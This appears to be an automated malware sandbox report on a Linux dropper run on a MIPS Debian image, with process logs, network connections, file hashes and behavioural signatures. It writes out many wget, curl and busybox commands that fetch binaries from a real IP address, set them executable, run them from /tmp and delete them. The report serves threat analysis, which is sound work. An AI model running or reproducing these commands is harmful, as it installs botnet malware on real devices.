[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/rm
[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/wget
[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/chmod
[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/rm
[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/wget
[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/chmod
[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/rm
[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/wget
[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/chmod
[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/rm
[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/wget
[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/chmod
[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/rm
[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/wget
[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/chmod
[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/rm
[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/wget
[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/chmod
[chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
[./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/rm
[rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/wget
[wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/chmod
[chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
[./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/rm
[rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/wget
[wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/chmod
[chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
[./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/rm
[rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/wget
[wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/chmod
[chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
[./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/rm
[rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/usr/bin/wget
[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/chmod
[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/rm
[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/wget
[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/chmod
[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/rm
[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/wget
[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/chmod
[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/rm
[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/wget
[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/chmod
[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7
[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/rm
[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/wget
[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/chmod
[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/rm
[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/wget
[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/chmod
[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/rm
[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/wget
[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/chmod
[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/rm
[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/wget
[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/chmod
[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/rm
[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/wget
[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/chmod
[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/rm
[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/wget
[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/chmod
[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/rm
[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/wget
[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/chmod
[chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
[./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/rm
[rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/wget
[wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/chmod
[chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
[./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/rm
[rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/wget
[wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/chmod
[chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
[./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/rm
[rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/wget
[wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/chmod
[chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
[./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/rm
[rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-20 02:53
Reported
2024-11-20 02:55
Platform
debian9-mipsel-20240729-en
Max time kernel
62s
Max time network
64s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | N/A |
| N/A | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | N/A |
| N/A | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | N/A |
| N/A | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | N/A |
| N/A | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | N/A |
| N/A | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | N/A |
| N/A | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | N/A |
| N/A | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | N/A |
| N/A | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | N/A |
| N/A | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | N/A |
| N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | N/A |
| N/A | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | N/A |
| N/A | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | N/A |
| N/A | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | N/A |
| N/A | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | N/A |
| N/A | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | N/A |
| N/A | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | N/A |
| N/A | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | N/A |
| N/A | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | N/A |
| N/A | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | N/A |
| N/A | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | N/A |
| N/A | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | N/A |
| N/A | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | N/A |
| N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | N/A |
| N/A | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | N/A |
| N/A | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
